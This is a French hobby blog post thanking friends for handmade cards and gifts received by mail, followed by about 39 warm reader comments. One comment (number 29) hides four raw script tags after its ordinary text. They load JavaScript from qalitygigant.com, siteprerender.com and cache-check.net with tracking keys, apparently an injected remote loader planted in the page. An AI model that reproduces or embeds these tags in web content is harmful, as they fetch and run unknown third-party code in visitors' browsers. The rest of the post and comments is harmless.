• Dans ma Bal

     

     

    Dans ma Bal

     

     

     

     

    Bonjour tout le Monde.... Et oui, je publie un Dimanche, je me suis dit qu'un jour sur deux incluait aussi le week-end, ce qui me permettra de créer pour ces jours-ci....

    Merci pour toutes celles qui me visitent en prenant le temps de me lire et de regarder ce que j'ai fait...

    J'ai reçu des merveilles cette semaine.... J'ai envoyé un mail à chacune d'entre vous pour vous dire combien votre attention envers moi m'a touchée ♥♥♥

     

     

     

     

    Dans ma Bal

     

     

     

     

    De Bibikaféine...

     

     

    Dans ma Bal

     

     

    Son Blog.... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    De Cristal 24...

     

     

    Dans ma Bal

     

     

    Son Blog.... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    De Danie...

     

     

    Dans ma Bal

     

     

    Son Blog... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    De Nelly...

     

     

    Dans ma Bal

     

     

    Son Blog... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    De Patounet...

     

     

    Dans ma Bal

    Dans ma Bal

    Dans ma Bal

     

     

    Sa page Facebook.... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    De Pierrette...

     

     

    Dans ma Bal

     

     

    Son Blog... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    De Qinoa...

     

     

    Dans ma Bal

     

     

    Son Blog... ICI

    Sa Boutique... ICI

     

     

    ♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥~♥♥♥♥♥

     

     

    A vous toutes je vous dis, du fond du cœur...

     

     

    Dans ma Bal

     

     

     

     

    Dans ma Bal

     

     

     

     

    Dans ma Bal

     

     

    (à Retrouver dans la Rubrique "Bisous"-"Divers"... ICI)

     

     

     

     

    Dans ma Bal

     

     

    (à Retrouver dans la Rubrique "Jours"-"Dimanche"-"Printemps"... ICI)

     

     


    Tags Tags : , , , , , , , , ,
  • Commentaires

    39
    Dimanche 31 Mai 2020 à 11:11

    Bon dimanche ma Valie le peu que je vois de ton design été est superbe , je suis fan, en attendant bondimanche, moi aussi je vais mettre mon blog été en ligne la semaine prochaine et totalement fat par moi pour la 1ère fois , il faudra me pardonner les petits dégats, mais je suis assez fière, merci de tes passages sur mon blog afrique adorée, prends soin de toi bisous tendresse

    38
    Samedi 30 Mai 2020 à 15:32
    J'ai tellement de retard dans mes visites que je ne sais même pas si c'est un dimanche ou non !!
    Tu as effectivement reçu de bien merveilleuses choses !! Les Copinettes sont talentueuses et tu le mérite bien. Gros Bisous
    37
    Samedi 30 Mai 2020 à 14:36

    tu as été bien gâté par les copinettes. ta bal est magnifique. bravo aux créatrices bon week-end biosus liliane

    36
    Mercredi 27 Mai 2020 à 23:45

    Tu as reçu des merveilles !

    Quel plaisir tout ce courrier !

    Bonne nuit.
    Bises.

    35
    Mercredi 27 Mai 2020 à 09:18

    ta bal est remplie d amitié ca fais plaisir

    bisous

     

    34
    Mardi 26 Mai 2020 à 21:41
    bibikafeine

    une très belle BAL...ravie d'avoir participé à ton plaisir.
    bravo aux copines pour leurs réas. gros bisous

    33
    Mardi 26 Mai 2020 à 14:55

    Tu as été gâtée ! Je te remercie encore pour ta jolie carte ! Surveille ta boîte, je t'ai posté une enveloppe pour ton anniv' (avec beaucoup de retard !!) et pour te remercier d'avoir pensé à moi ! Belle semaine sous le soleil ! Bisous et à bientôt !

    32
    Lundi 25 Mai 2020 à 20:45

    Bonsoir ma douce Valie

    Merci d'avoir pris ma créa , j'espère que tu vas bien 

    et que chez toi les gens sont plus responsables

    que  par içi ? pas de distances pas de masques !

    Bonne et douce soirée mon amie et gros bisous pour toi

    Janine

    31
    Lundi 25 Mai 2020 à 17:15

    https://i.postimg.cc/cLDnp7pC/cath-valie.pngen retard ma gentille Valie.  Tu as reçu de très jolis cadeaux, tu le mérites.  Je te souhaite une belle année remplie de Bonheur et de Santé.

    https://i.postimg.cc/4dvNgsYP/cadeau-valie.gif

     

    30
    Lundi 25 Mai 2020 à 16:04

    Je peux comprendre que tu sois touchée par ce si joli travail...Bravo à Toutes,vous êtes des Artistes...

    J'adore ce petit monde si vivant et rempli de choses

    tellement mignonnes...Merci Valie pour cette page.

    Désolée j'étais absente,mais c'est bien de venir aussi un autre jour en visite...

    Plein de Bisous à Toi...à Toutes*BRAVO*

       Un beau bouquet

    29
    mamijojo77100
    Lundi 25 Mai 2020 à 15:47

    que de jolies creations en tous genre, bravo aux copinettes.de quoi te ravir ma petite valie..Ca fait plaisir d ouvrir sa bal.. ICI soleil mais il se cache et un petit vent je voulais aller dehors du coup je suis rentree au bercail.. GBISOUS  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1590414245749" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    28
    Lundi 25 Mai 2020 à 15:12

    oups j'avais oublié de décocher la case. Bisous

    27
    Lundi 25 Mai 2020 à 15:00

    De bien jolies choses dans ta BAL une fois de plus mais tu le mérite bien

    Week-end tranquille pour moi

    Je te souhaite un bon début de semaine

    Gros bisous

     

    26
    Lundi 25 Mai 2020 à 14:46

    Bonjour Valie,

    jolie création, moi je prendrai bien un petit café et un croissant lol, je te souhaite une bonne semaine,

    prends soin de toi, bise amicale

    25
    Lundi 25 Mai 2020 à 14:33

    plein de jolies choses ! belle semaine à toi plein de bisous

    24
    Lundi 25 Mai 2020 à 13:17

    Une belle galerie de réas variées et superbement réalisées. Bravo à toutes !

    23
    Lundi 25 Mai 2020 à 11:07

    Oh la la quelle jolie bal, une grand bravo aux copinettes pour leur créativité et contente pour toi, ça fait vraiment du bien.

    Gros bisous, bonne journée.

    22
    Lundi 25 Mai 2020 à 09:55
    Que de merveilles bravo les aminettes. Bisous à toutes
    21
    Lundi 25 Mai 2020 à 09:49

    C'est superbe tout ça !! Chez moi, j'ai préparé ton envoi, mais je ne sais pas quand j'irai à la poste...

    Bises

    Thaly

    20
    Dimanche 24 Mai 2020 à 21:13

    Ta bal est bien remplie de merveilles bravo aux copinautes , mais tu le mérite gros bisous. 

    19
    Jacline-H-49
    Dimanche 24 Mai 2020 à 20:53

    C'est ta BAL aussi qui doit être contente de savoir que tu vas être émerveillée par de si belles cartes et autres, parce que sans nul doute que tu l'es !! Il faut dire aussi que ce sont des réalisations faites avec passion et rien que pour toi.

    J'espère que tu as passé un bon dimanche, et que tu passes une bonne soirée.

    Mes voeux pour une douce nuit et une bonne semaine qui va s'en suivre. 

    GROS BISOUS TENDRESSE ma chère Valie !

    Jacline 

     

    18
    Dimanche 24 Mai 2020 à 20:44

    Bonsoir Valie

    D'habitude je ne passe pas le dimanche  mais je suis contente d'être passée pour voir tous ces beaux ouvrages tes amies et toi même vous avez des doigts 

    de fée
    Bonne et douce soirée et gros bisous

    Janine

    17
    Dimanche 24 Mai 2020 à 20:35

    Que du bonheur dans ta bal.....ravie d'y avoir contribué bravo à toutes les créatrices

    Gros bisous Pierrette67

    16
    Dimanche 24 Mai 2020 à 18:24

    superbes toutes ces créas dans ta BAL 

    bisous

    15
    Dimanche 24 Mai 2020 à 17:54

    De belles attentions pour toi !

    bonne soirée ; bisous / Nicole

     


    14
    Dimanche 24 Mai 2020 à 16:49

    Les filles ont tellement bien travaillé pour faire de merveilleux cadeaux. Il me semble que ta fête est passée, je me trompe ou non ? Bonne semaine ma belle Valie, gros bisous !

     

     

    13
    Dimanche 24 Mai 2020 à 15:42
    Que du bonheur dans ta bal. Bravo aux créatrices.
    Gros bisous Béa
    12
    Dimanche 24 Mai 2020 à 13:01

    Waouhh que de merveilles dans ta bal, bravo aux copines! J'aime particulièrement les brodées! Bravo à toutes et ravie pour toi! Bises et bon dimanche Nadine

    11
    Dimanche 24 Mai 2020 à 12:22

    une belle bal bien remplie dis donc que de beautés bravo aux filles 

    gros bisous plein de soleil 

    10
    Dimanche 24 Mai 2020 à 12:12

    Quelle belle BAL !! Toutes ces créations sont vraiment ravissantes, Bravo à toutes les créatrices & heureuse pour toi ma tite Valie !!

    Agréable Dimanche, Doux Bisous.

    9
    Jeannine (cristal24)
    Dimanche 24 Mai 2020 à 11:16

    Coucou Valie,

    Tu as reçu de bien belles cartes et de beaux présents,mais tu le mérites bien. Les filles t'ont bien gâtée.

    Juste une petite remarque, tu as mis ma carte à l'envers happy !!

    Bon dimanche ensoleillée. La pluie d'hier est déjà oubliée.

    A bientôt.   Bises.

    Jeannine

     

    8
    marianne pirotte
    Dimanche 24 Mai 2020 à 11:01

    Que de jolies merveilles dans ta bal, que du bonheur !!

    Gros bisous et bon dimanche

    Marianne

    7
    Dimanche 24 Mai 2020 à 10:51

    Une jolie BAL à bonheur des copinettes!! Contente de t'avoir fait plaisir.......

    Bisous et doux dimanche

    6
    Gaelle
    Dimanche 24 Mai 2020 à 10:05
    Waouh! Que de merveilles !
    Bravo à toutes.
    Biz
    Gaelle
    5
    Dimanche 24 Mai 2020 à 08:57

    Tu es très gâtée je trouve toutes ces créations tellement jolies et fines, quelle patience, bravo à toutes tes amies. Je vous souhaite à toutes un très bon dimanche. Bises & amitié.

    4
    Dimanche 24 Mai 2020 à 08:55

      Waouh!!!!   que  de  belles  attentions    bravo  à  toutes

      gros  bisous

    3
    Jour de mai
    Dimanche 24 Mai 2020 à 08:34

    Coucou Valie, 

    Une Bal remplie de bonheur et de magnifiques choses réalisées. Bravo aux créatrices, les inspirations sont bien différentes mais au combien belles. 

    Je te souhaite un très bon dimanche, ensoleillé et heureux. 

    Gros bisous ♥♥♥♥

    LN

    2
    Dimanche 24 Mai 2020 à 07:56

    Coucou ma Valie, moi je réponds à mes gentils coms le dimanche cela m occupe, hier très fort orage et ce matin , mistral mais soleil, mais cela rafraichit le temps, tous les kdos de tes amies sont superbes, scrapbooking comme broderie j adore, je fais le point compté mais ces temps ci comme j ai une nouvelle chimio c est dur et puis quand il fait beau je préfère la lecture dehors cela m apaise, je te souhaite un bon dimanche ma gentille amie et profite bien de ce jour paisible en soi, bisous tendresse 

    1
    Qinoa
    Dimanche 24 Mai 2020 à 07:55
    De bien beaux envois encore une fois. Je suis bien heureuse que ma petite dame ait réussi à trouver enfin sa route vers toi
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :